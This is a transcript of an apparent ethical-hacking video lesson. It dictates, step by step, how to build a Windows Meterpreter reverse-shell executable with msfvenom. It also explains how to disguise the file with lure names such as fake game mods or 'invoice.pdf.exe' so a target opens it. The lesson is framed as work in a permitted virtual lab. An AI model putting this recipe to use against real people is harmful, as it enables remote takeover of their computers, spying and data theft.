[00:00:03] In this lesson, we're going to learn how easy it is for an attacker to create a piece of malware that can infect and take control of your computer, your smartphone, your laptop, you name it. In fact, most people are really surprised when they see that it only takes one line of code in the Metasploit Framework to create a virus that can do all the damage we've been talking about: taking over your webcam, looking through your files, stealing your keystrokes and more. This is one long line that starts with msfvenom. That's the Metasploit Framework Venom, which is our payload creation tool. It's going to allow us to embed a payload called a Meterpreter. Meterpreter is the tool that's going to give us a remote shell, or complete control over a remote computer across the Internet, from our Kali machine into our Windows 10 machine. And we're gonna see how to create this one long line command, and that will create a virus we can give a cool name. So let's click into our Kali box. And we've already started up the Metasploit Framework console by coming to 08 Exploitation Tools and choosing Metasploit Framework. You can also, from the command line, just type in msfconsole. That's Metasploit Framework console. So I'm going to use Control-L to clear the screen.

[00:01:31] And I'll increase the font size just a little bit there, and we're gonna start typing this one long line, that is msfvenom. And we're going to give a payload, dash p, and there can be no space between the dash and the p: windows slash meterpreter slash reverse underscore tcp. The reverse TCP for our Meterpreter, Metasploit interpreter shell for Windows, is going to give us a reverse TCP connection. That means it's gonna call us. We don't have to look for machines to attack. We just send people this file, and if they click on it, they will then give us a reverse TCP connection. They'll call back to us, they phone home with this virus. So this will create a payload of the Windows Meterpreter shell, reverse TCP connection back to our machine. We just need to tell it our local host address. Now, if you don't remember your Kali IP address, you can just start a new shell and type ip a, or ip addr, or ip address. And you can see my machine has picked up a new IP address, I believe ten dot oh dot ninety seven. That's why we always check before we run the virus. So we'll say LHOST equals and your IP address from your Kali machine. So ten dot oh dot nine dot seven is mine. And I'm going to keep typing this really long command.

[00:03:04] We're gonna give it a dash f for a format of an executable file, a Windows executable file: dash f exe, space. And we're gonna run off of this line because it's too long to fit on one. You can either use the backslash to automatically take you down to the next line, or you can just keep typing if it doesn't mess you up too much. If you do a backslash and Enter, you can continue the command, or you can just keep typing. I'm going to do a dash o output of tilde slash Desktop. That will be my desktop on the Kali box, slash. I want to give this a really cool name because I want my intended victim, the person that I have permission to test (in this case, it's me), to want to click and install that piece of software. So depending on the person that you've been hired to do security testing for, that may be funny cat videos dot exe. That may be an invoice dot pdf dot exe. Anything that would trick your user into clicking and opening that file, because once that person clicks that file, if they're not protected with a good firewall, with good antivirus, it is going to give you full control of that remote machine. So we've got our dash format exe.

[00:04:20] We need to use our dash o for output, or the output formatted file, dash o, so we need to give it a good name. So we're gonna use tilde slash Desktop, and you do have to spell Desktop correctly. In fact, the spelling is really the hardest part of this entire process, since it only takes one line to create a virus. The only catch is you've got to type that entire line correctly, in one long line that wraps around to a new line on your screen. So I'm going to give this a name like Fortnite all skins, or Fortnite God mode, or Fortnite something. I just know that a lot of my students seem to be playing Fortnite from time to time. Fortnite underscore all skins. So this is just a mod pack for Fortnite to an unsuspecting user. Again, like I mentioned, that might be HR files dot exe, or overdue invoice dot pdf dot exe, or funny cat videos, whatever it would take to get your user to click through. So we've got a Metasploit Venom payload of windows meterpreter reverse underscore tcp with a local host address, LHOST. This is the address that we want that reverse TCP Meterpreter shell to call back to us to give us control. And the format of this file will be an executable. The output file will go right on our desktop as Fortnite underscore all skins dot exe.

[00:05:56] When you get that entire thing typed in correctly, press Enter, and it should take just a couple of moments to generate this executable file. It actually only takes a few hundred bytes to be able to build that Metasploit Meterpreter reverse interpreter, that reverse shell, into our payload. So it created a payload of just three hundred forty-one bytes. That's what it takes to actually infect the other computer. But it put it in a file of seventy-two thousand eight hundred and two, seventy-three thousand eight hundred and two bytes. So that's a 73K file called Fortnite all skins that will then run everything that we need to actually inject this Trojan into our remote host. So it says it created a file on my desktop. The tilde slash Desktop was just short for slash home slash kali. Or if you're on an older version of Linux, that'll be your slash root slash Desktop. But if we minimize this window, we should see we have a file called Fortnite all skins dot exe, an executable file, a Windows application file, sitting on our Kali desktop.

[00:07:06] When we come back in the next lesson, we're going to see how to share that remotely through a web server so that we'll be able to infect our Windows machine, and we'll do it all free right here from Kali in our safe virtual hacking lab.